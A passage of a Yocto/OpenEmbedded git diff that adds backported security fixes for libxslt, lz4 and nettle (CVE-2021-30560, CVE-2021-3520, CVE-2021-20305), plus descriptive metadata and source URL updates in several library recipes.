+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -71,7 +64,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/x86_64/Ginit.c b/src/x86_64/Ginit.c
+index b7e8e462..fe6bcc33 100644
+--- a/src/x86_64/Ginit.c
++++ b/src/x86_64/Ginit.c
+@@ -49,13 +49,6 @@ static struct unw_addr_space local_addr_space;
+
+ unw_addr_space_t unw_local_addr_space = &local_addr_space;
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -66,7 +59,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+--
+2.32.0
+
diff --git a/meta/recipes-support/libunwind/libunwind_1.3.1.bb b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
index 037e04c3c0..8ae94a834c 100644
--- a/meta/recipes-support/libunwind/libunwind_1.3.1.bb
+++ b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
@@ -7,6 +7,7 @@ SRC_URI = "http://download.savannah.nongnu.org/releases/libunwind/libunwind-${PV
file://0004-Fix-build-on-mips-musl.patch \
file://0005-ppc32-Consider-ucontext-mismatches-between-glibc-and.patch \
file://0006-Fix-for-X32.patch \
+ file://0001-Fix-compilation-with-fno-common.patch \
"
SRC_URI_append_libc-musl = " file://musl-header-conflict.patch"
diff --git a/meta/recipes-support/liburcu/liburcu_0.11.1.bb b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
index 6a517e6f29..1902415c90 100644
--- a/meta/recipes-support/liburcu/liburcu_0.11.1.bb
+++ b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "Userspace RCU (read-copy-update) library"
+DESCRIPTION = "A userspace RCU (read-copy-update) library. This data \
+synchronization library provides read-side access which scales linearly \
+with the number of cores. "
HOMEPAGE = "http://lttng.org/urcu"
BUGTRACKER = "http://lttng.org/project/issues"
diff --git a/meta/recipes-support/libusb/libusb1_1.0.22.bb b/meta/recipes-support/libusb/libusb1_1.0.22.bb
index 1d9d772575..ffa8f0320c 100644
--- a/meta/recipes-support/libusb/libusb1_1.0.22.bb
+++ b/meta/recipes-support/libusb/libusb1_1.0.22.bb
@@ -1,5 +1,7 @@
SUMMARY = "Userspace library to access USB (version 1.0)"
-HOMEPAGE = "http://libusb.sf.net"
+DESCRIPTION = "A cross-platform library to access USB devices from Linux, \
+macOS, Windows, OpenBSD/NetBSD, Haiku and Solaris userspace."
+HOMEPAGE = "https://libusb.info"
BUGTRACKER = "http://www.libusb.org/report"
SECTION = "libs"
@@ -8,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
BBCLASSEXTEND = "native nativesdk"
-SRC_URI = "${SOURCEFORGE_MIRROR}/libusb/libusb-${PV}.tar.bz2 \
+SRC_URI = "https://github.com/libusb/libusb/releases/download/v${PV}/libusb-${PV}.tar.bz2 \
file://no-dll.patch \
file://run-ptest \
"
diff --git a/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
new file mode 100644
index 0000000000..614047ea7a
--- /dev/null
+++ b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
@@ -0,0 +1,201 @@
+From 50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 12 Jun 2021 20:02:53 +0200
+Subject: [PATCH] Fix use-after-free in xsltApplyTemplates
+
+xsltApplyTemplates without a select expression could delete nodes in
+the source document.
+
+1. Text nodes with strippable whitespace
+
+Whitespace from input documents is already stripped, so there's no
+need to strip it again. Under certain circumstances, xsltApplyTemplates
+could be fooled into deleting text nodes that are still referenced,
+resulting in a use-after-free.
+
+2. The DTD
+
+The DTD was only unlinked, but there's no good reason to do this just
+now. Maybe it was meant as a micro-optimization.
+
+3. Unknown nodes
+
+Useless and dangerous as well, especially with XInclude nodes.
+See https://gitlab.gnome.org/GNOME/libxml2/-/issues/268
+
+Simply stop trying to uselessly delete nodes when applying a template.
+This part of the code is probably a leftover from a time where
+xsltApplyStripSpaces wasn't implemented yet. Also note that
+xsltApplyTemplates with a select expression never tried to delete
+nodes.
+
+Also stop xsltDefaultProcessOneNode from deleting nodes for the same
+reasons.
+
+This fixes CVE-2021-30560.
+
+CVE: CVE-2021-30560
+Upstream-Status: Backport [https://github.com/GNOME/libxslt/commit/50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8.patch]
+Comment: No change in any hunk
+Signed-off-by: Omkar Patil <Omkar.Patil@kpit.com>
+
+---
+ libxslt/transform.c | 119 +++-----------------------------------------
+ 1 file changed, 7 insertions(+), 112 deletions(-)
+
+diff --git a/libxslt/transform.c b/libxslt/transform.c
+index 04522154..3aba354f 100644
+--- a/libxslt/transform.c
++++ b/libxslt/transform.c
+@@ -1895,7 +1895,7 @@ static void
+ xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ xsltStackElemPtr params) {
+ xmlNodePtr copy;
+- xmlNodePtr delete = NULL, cur;
++ xmlNodePtr cur;
+ int nbchild = 0, oldSize;
+ int childno = 0, oldPos;
+ xsltTemplatePtr template;
+@@ -1968,54 +1968,13 @@ xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ return;
+ }
+ /*
+- * Handling of Elements: first pass, cleanup and counting
++ * Handling of Elements: first pass, counting
+ */
+ cur = node->children;
+ while (cur != NULL) {
+- switch (cur->type) {
+- case XML_TEXT_NODE:
+- case XML_CDATA_SECTION_NODE:
+- case XML_DOCUMENT_NODE:
+- case XML_HTML_DOCUMENT_NODE:
+- case XML_ELEMENT_NODE:
+- case XML_PI_NODE:
+- case XML_COMMENT_NODE:
+- nbchild++;
+- break;
+- case XML_DTD_NODE:
+- /* Unlink the DTD, it's still reachable using doc->intSubset */
+- if (cur->next != NULL)
+- cur->next->prev = cur->prev;
+- if (cur->prev != NULL)
+- cur->prev->next = cur->next;
+- break;
+- default:
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltDefaultProcessOneNode: skipping node type %d\n",
+- cur->type));
+-#endif
+- delete = cur;
+- }
++ if (IS_XSLT_REAL_NODE(cur))
++ nbchild++;
+ cur = cur->next;
+- if (delete != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
+-#endif
+- xmlUnlinkNode(delete);
+- xmlFreeNode(delete);
+- delete = NULL;
+- }
+- }
+- if (delete != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
+-#endif
+- xmlUnlinkNode(delete);
+- xmlFreeNode(delete);
+- delete = NULL;
+ }
+
+ /*
+@@ -4864,7 +4823,7 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ xsltStylePreCompPtr comp = (xsltStylePreCompPtr) castedComp;
+ #endif
+ int i;
+- xmlNodePtr cur, delNode = NULL, oldContextNode;
++ xmlNodePtr cur, oldContextNode;
+ xmlNodeSetPtr list = NULL, oldList;
+ xsltStackElemPtr withParams = NULL;
+ int oldXPProximityPosition, oldXPContextSize;
+@@ -4998,73 +4957,9 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ else
+ cur = NULL;
+ while (cur != NULL) {
+- switch (cur->type) {
+- case XML_TEXT_NODE:
+- if ((IS_BLANK_NODE(cur)) &&
+- (cur->parent != NULL) &&
+- (cur->parent->type == XML_ELEMENT_NODE) &&
+- (ctxt->style->stripSpaces != NULL)) {
+- const xmlChar *val;
+-
+- if (cur->parent->ns != NULL) {
+- val = (const xmlChar *)
+- xmlHashLookup2(ctxt->style->stripSpaces,
+- cur->parent->name,
+- cur->parent->ns->href);
+- if (val == NULL) {
+- val = (const xmlChar *)
+- xmlHashLookup2(ctxt->style->stripSpaces,
+- BAD_CAST "*",
+- cur->parent->ns->href);
+- }
+- } else {
+- val = (const xmlChar *)
+- xmlHashLookup2(ctxt->style->stripSpaces,
+- cur->parent->name, NULL);
+- }
+- if ((val != NULL) &&
+- (xmlStrEqual(val, (xmlChar *) "strip"))) {
+- delNode = cur;
+- break;
+- }
+- }
+- /* Intentional fall-through */
+- case XML_ELEMENT_NODE:
+- case XML_DOCUMENT_NODE:
+- case XML_HTML_DOCUMENT_NODE:
+- case XML_CDATA_SECTION_NODE:
+- case XML_PI_NODE:
+- case XML_COMMENT_NODE:
+- xmlXPathNodeSetAddUnique(list, cur);
+- break;
+- case XML_DTD_NODE:
+- /* Unlink the DTD, it's still reachable
+- * using doc->intSubset */
+- if (cur->next != NULL)
+- cur->next->prev = cur->prev;
+- if (cur->prev != NULL)
+- cur->prev->next = cur->next;
+- break;
+- case XML_NAMESPACE_DECL:
+- break;
+- default:
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltApplyTemplates: skipping cur type %d\n",
+- cur->type));
+-#endif
+- delNode = cur;
+- }
++ if (IS_XSLT_REAL_NODE(cur))
++ xmlXPathNodeSetAddUnique(list, cur);
+ cur = cur->next;
+- if (delNode != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltApplyTemplates: removing ignorable blank cur\n"));
+-#endif
+- xmlUnlinkNode(delNode);
+- xmlFreeNode(delNode);
+- delNode = NULL;
+- }
+ }
+ }
+
diff --git a/meta/recipes-support/libxslt/libxslt_1.1.34.bb b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
index 1961bb5b31..4755677bec 100644
--- a/meta/recipes-support/libxslt/libxslt_1.1.34.bb
+++ b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
@@ -1,4 +1,9 @@
SUMMARY = "GNOME XSLT library"
+DESCRIPTION = "libxslt is the XSLT C parser and toolkit developed for the Gnome project. \
+XSLT itself is a an XML language to define transformation for XML. Libxslt is based on \
+libxml2 the XML C library developed for the GNOME project. It also implements most of \
+the EXSLT set of processor-portable extensions functions and some of Saxon's evaluate \
+and expressions extensions."
HOMEPAGE = "http://xmlsoft.org/XSLT/"
BUGTRACKER = "https://bugzilla.gnome.org/"
@@ -9,6 +14,7 @@ SECTION = "libs"
DEPENDS = "libxml2"
SRC_URI = "http://xmlsoft.org/sources/libxslt-${PV}.tar.gz \
+ file://CVE-2021-30560.patch \
"
SRC_URI[md5sum] = "db8765c8d076f1b6caafd9f2542a304a"
@@ -16,6 +22,10 @@ SRC_URI[sha256sum] = "98b1bd46d6792925ad2dfe9a87452ea2adebf69dcb9919ffd55bf926a7
UPSTREAM_CHECK_REGEX = "libxslt-(?P<pver>\d+(\.\d+)+)\.tar"
+# We have libxml2 2.9.10 and we don't link statically with it anyway
+# so this isn't an issue.
+CVE_CHECK_WHITELIST += "CVE-2022-29824"
+
S = "${WORKDIR}/libxslt-${PV}"
BINCONFIG = "${bindir}/xslt-config"
diff --git a/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
new file mode 100644
index 0000000000..5ac8f6691f
--- /dev/null
+++ b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
@@ -0,0 +1,27 @@
+From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001
+From: Jasper Lievisse Adriaanse <j@jasper.la>
+Date: Fri, 26 Feb 2021 15:21:20 +0100
+Subject: [PATCH] Fix potential memory corruption with negative memmove() size
+
+Upstream-Status: Backport
+https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7
+CVE: CVE-2021-3520
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ lib/lz4.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/lib/lz4.c
+===================================================================
+--- git.orig/lib/lz4.c
++++ git/lib/lz4.c
+@@ -1665,7 +1665,7 @@ LZ4_decompress_generic(
+ const size_t dictSize /* note : = 0 if noDict */
+ )
+ {
+- if (src == NULL) { return -1; }
++ if ((src == NULL) || (outputSize < 0)) { return -1; }
+
+ { const BYTE* ip = (const BYTE*) src;
+ const BYTE* const iend = ip + srcSize;
diff --git a/meta/recipes-support/lz4/lz4_1.9.2.bb b/meta/recipes-support/lz4/lz4_1.9.2.bb
index 6510156ed0..bc11a57eb5 100644
--- a/meta/recipes-support/lz4/lz4_1.9.2.bb
+++ b/meta/recipes-support/lz4/lz4_1.9.2.bb
@@ -1,5 +1,6 @@
SUMMARY = "Extremely Fast Compression algorithm"
DESCRIPTION = "LZ4 is a very fast lossless compression algorithm, providing compression speed at 400 MB/s per core, scalable with multi-cores CPU. It also features an extremely fast decoder, with speed in multiple GB/s per core, typically reaching RAM speed limits on multi-core systems."
+HOMEPAGE = "https://github.com/lz4/lz4"
LICENSE = "BSD | BSD-2-Clause | GPL-2.0"
LIC_FILES_CHKSUM = "file://lib/LICENSE;md5=ebc2ea4814a64de7708f1571904b32cc \
@@ -11,8 +12,13 @@ PE = "1"
SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd"
-SRC_URI = "git://github.com/lz4/lz4.git \
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
+SRC_URI = "git://github.com/lz4/lz4.git;branch=dev;protocol=https \
file://run-ptest \
+ file://CVE-2021-3520.patch \
"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
@@ -21,7 +27,7 @@ S = "${WORKDIR}/git"
# Fixed in r118, which is larger than the current version.
CVE_CHECK_WHITELIST += "CVE-2014-4715"
-EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
+EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' CFLAGS='${CFLAGS}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
do_install() {
oe_runmake install
diff --git a/meta/recipes-support/lzo/lzo_2.10.bb b/meta/recipes-support/lzo/lzo_2.10.bb
index 8eefec3cc9..f0c8631aea 100644
--- a/meta/recipes-support/lzo/lzo_2.10.bb
+++ b/meta/recipes-support/lzo/lzo_2.10.bb
@@ -1,4 +1,6 @@
SUMMARY = "Lossless data compression library"
+DESCRIPTION = "A portable lossless data compression library written in \
+ANSI C that offers pretty fast compression and *extremely* fast decompression. "
HOMEPAGE = "http://www.oberhumer.com/opensource/lzo/"
SECTION = "libs"
LICENSE = "GPLv2+"
@@ -16,6 +18,8 @@ SRC_URI[sha256sum] = "c0f892943208266f9b6543b3ae308fab6284c5c90e627931446fb49b42
inherit autotools ptest
+CVE_PRODUCT = "lzo oberhumer:lzo2"
+
EXTRA_OECONF = "--enable-shared"
do_install_ptest() {
diff --git a/meta/recipes-support/lzop/lzop_1.04.bb b/meta/recipes-support/lzop/lzop_1.04.bb
index b50c230437..59c2003b74 100644
--- a/meta/recipes-support/lzop/lzop_1.04.bb
+++ b/meta/recipes-support/lzop/lzop_1.04.bb
@@ -5,6 +5,7 @@ gzip are much higher compression and decompression speed at the cost of some \n\
compression ratio. The lzop compression utility was designed with the goals \n\
of reliability, speed, portability and with reasonable drop-in compatibility \n\
to gzip."
+HOMEPAGE = "http://www.lzop.org/"
DEPENDS += "lzo"
LICENSE = "GPLv2+"
diff --git a/meta/recipes-support/mpfr/mpfr_4.0.2.bb b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
index 00c2dc2fe9..0ac73f031f 100644
--- a/meta/recipes-support/mpfr/mpfr_4.0.2.bb
+++ b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
@@ -1,4 +1,5 @@
SUMMARY = "C library for multiple-precision floating-point computations with exact rounding"
+DESCRIPTION = "The GNU Multiple Precision Floating-Point Reliable Library (GNU MPFR) is a GNU portable C library for arbitrary-precision binary floating-point computation with correct rounding, based on GNU Multi-Precision Library. MPFR's computation is both efficient and has a well-defined semantics: the functions are completely specified on all the possible operands and the results do not depend on the platform."
HOMEPAGE = "https://www.mpfr.org/"
LICENSE = "LGPLv3+"
SECTION = "devel"
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
new file mode 100644
index 0000000000..cfc0f382fa
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
@@ -0,0 +1,215 @@
+Backport of:
+
+From a63893791280d441c713293491da97c79c0950fe Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Thu, 11 Mar 2021 19:37:41 +0100
+Subject: [PATCH] New functions ecc_mod_mul_canonical and
+ ecc_mod_sqr_canonical.
+
+* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+New functions.
+* ecc-internal.h: Declare and document new functions.
+* curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
+* curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
+* ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
+* ecc-j-to-a.c (ecc_j_to_a): Likewise.
+* ecc-mul-m.c (ecc_mul_m): Likewise.
+
+(cherry picked from commit 2bf497ba4d6acc6f352bca015837fad33008565c)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-1.patch
+CVE: CVE-2021-20305 dep1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 11 +++++++++++
+ curve25519-eh-to-x.c | 6 +-----
+ curve448-eh-to-x.c | 5 +----
+ ecc-eh-to-a.c | 12 ++----------
+ ecc-internal.h | 15 +++++++++++++++
+ ecc-j-to-a.c | 15 +++------------
+ ecc-mod-arith.c | 24 ++++++++++++++++++++++++
+ ecc-mul-m.c | 6 ++----
+ 8 files changed, 59 insertions(+), 35 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index fd138d82..5cc5c188 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,3 +1,14 @@
+#+2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#+
+#+ * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+#+ New functions.
+#+ * ecc-internal.h: Declare and document new functions.
+#+ * curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
+#+ * curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
+#+ * ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
+#+ * ecc-j-to-a.c (ecc_j_to_a): Likewise.
+#+ * ecc-mul-m.c (ecc_mul_m): Likewise.
+#+
+# 2021-02-17 Niels Möller <nisse@lysator.liu.se>
+#
+# * Released Nettle-3.7.1.
+Index: nettle-3.5.1/curve25519-eh-to-x.c
+===================================================================
+--- nettle-3.5.1.orig/curve25519-eh-to-x.c
++++ nettle-3.5.1/curve25519-eh-to-x.c
+@@ -53,7 +53,6 @@ curve25519_eh_to_x (mp_limb_t *xp, const
+ #define t2 (scratch + 2*ecc->p.size)
+
+ const struct ecc_curve *ecc = &_nettle_curve25519;
+- mp_limb_t cy;
+
+ /* If u = U/W and v = V/W are the coordiantes of the point on the
+ Edwards curve we get the curve25519 x coordinate as
+@@ -69,10 +68,7 @@ curve25519_eh_to_x (mp_limb_t *xp, const
+ ecc->p.invert (&ecc->p, t1, t0, t2 + ecc->p.size);
+
+ ecc_modp_add (ecc, t0, wp, vp);
+- ecc_modp_mul (ecc, t2, t0, t1);
+-
+- cy = mpn_sub_n (xp, t2, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, xp, t2, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, xp, t0, t1, t2);
+ #undef vp
+ #undef wp
+ #undef t0
+Index: nettle-3.5.1/ecc-eh-to-a.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-eh-to-a.c
++++ nettle-3.5.1/ecc-eh-to-a.c
+@@ -59,9 +59,7 @@ ecc_eh_to_a (const struct ecc_curve *ecc
+ /* Needs 2*size + scratch for the invert call. */
+ ecc->p.invert (&ecc->p, izp, zp, tp + ecc->p.size);
+
+- ecc_modp_mul (ecc, tp, xp, izp);
+- cy = mpn_sub_n (r, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r, xp, izp, tp);
+
+ if (op)
+ {
+@@ -81,7 +79,5 @@ ecc_eh_to_a (const struct ecc_curve *ecc
+ }
+ return;
+ }
+- ecc_modp_mul (ecc, tp, yp, izp);
+- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, yp, izp, tp);
+ }
+Index: nettle-3.5.1/ecc-internal.h
+===================================================================
+--- nettle-3.5.1.orig/ecc-internal.h
++++ nettle-3.5.1/ecc-internal.h
+@@ -49,6 +49,8 @@
+ #define ecc_mod_submul_1 _nettle_ecc_mod_submul_1
+ #define ecc_mod_mul _nettle_ecc_mod_mul
+ #define ecc_mod_sqr _nettle_ecc_mod_sqr
++#define ecc_mod_mul_canonical _nettle_ecc_mod_mul_canonical
++#define ecc_mod_sqr_canonical _nettle_ecc_mod_sqr_canonical
+ #define ecc_mod_random _nettle_ecc_mod_random
+ #define ecc_mod _nettle_ecc_mod
+ #define ecc_mod_inv _nettle_ecc_mod_inv
+@@ -263,6 +265,19 @@ ecc_mod_sqr (const struct ecc_modulo *m,
+ #define ecc_modq_mul(ecc, r, a, b) \
+ ecc_mod_mul (&(ecc)->q, (r), (a), (b))
+
++/* These mul and sqr functions produce a canonical result, 0 <= R < M.
++ Requirements on input and output areas are similar to the above
++ functions, except that it is *not* allowed to pass rp = rp +
++ m->size.
++ */
++void
++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp);
++
++void
++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, mp_limb_t *tp);
++
+ /* mod q operations. */
+ void
+ ecc_mod_random (const struct ecc_modulo *m, mp_limb_t *xp,
+Index: nettle-3.5.1/ecc-j-to-a.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-j-to-a.c
++++ nettle-3.5.1/ecc-j-to-a.c
+@@ -51,8 +51,6 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ #define izBp (scratch + 3*ecc->p.size)
+ #define tp scratch
+
+- mp_limb_t cy;
+-
+ if (ecc->use_redc)
+ {
+ /* Set v = (r_z / B^2)^-1,
+@@ -86,17 +84,14 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ ecc_modp_sqr (ecc, iz2p, izp);
+ }
+
+- ecc_modp_mul (ecc, iz3p, iz2p, p);
+- /* ecc_modp (and ecc_modp_mul) may return a value up to 2p - 1, so
+- do a conditional subtraction. */
+- cy = mpn_sub_n (r, iz3p, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r, iz3p, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r, iz2p, p, iz3p);
+
+ if (op)
+ {
+ /* Skip y coordinate */
+ if (op > 1)
+ {
++ mp_limb_t cy;
+ /* Also reduce the x coordinate mod ecc->q. It should
+ already be < 2*ecc->q, so one subtraction should
+ suffice. */
+@@ -106,10 +101,7 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ return;
+ }
+ ecc_modp_mul (ecc, iz3p, iz2p, izp);
+- ecc_modp_mul (ecc, tp, iz3p, p + ecc->p.size);
+- /* And a similar subtraction. */
+- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, iz3p, p + ecc->p.size, iz3p);
+
+ #undef izp
+ #undef up
+Index: nettle-3.5.1/ecc-mod-arith.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-mod-arith.c
++++ nettle-3.5.1/ecc-mod-arith.c
+@@ -119,6 +119,30 @@ ecc_mod_mul (const struct ecc_modulo *m,
+ }
+
+ void
++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp)
++{
++ mp_limb_t cy;
++ mpn_mul_n (tp + m->size, ap, bp, m->size);
++ m->reduce (m, tp + m->size);
++
++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, tp + m->size, m->size);
++}
++
++void
++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, mp_limb_t *tp)
++{
++ mp_limb_t cy;
++ mpn_sqr (tp + m->size, ap, m->size);
++ m->reduce (m, tp + m->size);
++
++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, tp + m->size, m->size);
++}
++
++void
+ ecc_mod_sqr (const struct ecc_modulo *m, mp_limb_t *rp,
+ const mp_limb_t *ap)
+ {
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
new file mode 100644
index 0000000000..bb56b14c8c
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
@@ -0,0 +1,53 @@
+Backport of:
+
+From 971bed6ab4b27014eb23085e8176917e1a096fd5 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 17:26:37 +0100
+Subject: [PATCH] Use ecc_mod_mul_canonical for point comparison.
+
+* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+
+(cherry picked from commit 5b7608fde3a6d2ab82bffb35db1e4e330927c906)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-2.patch
+CVE: CVE-2021-20305 dep2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 4 ++++
+ eddsa-verify.c | 9 ++-------
+ 2 files changed, 6 insertions(+), 7 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 5cc5c188..2a9217a6 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,3 +1,7 @@
+#+2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#+
+#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+#+
+# 2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#
+# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+Index: nettle-3.5.1/eddsa-verify.c
+===================================================================
+--- nettle-3.5.1.orig/eddsa-verify.c
++++ nettle-3.5.1/eddsa-verify.c
+@@ -53,13 +53,8 @@ equal_h (const struct ecc_modulo *p,
+ #define t0 scratch
+ #define t1 (scratch + p->size)
+
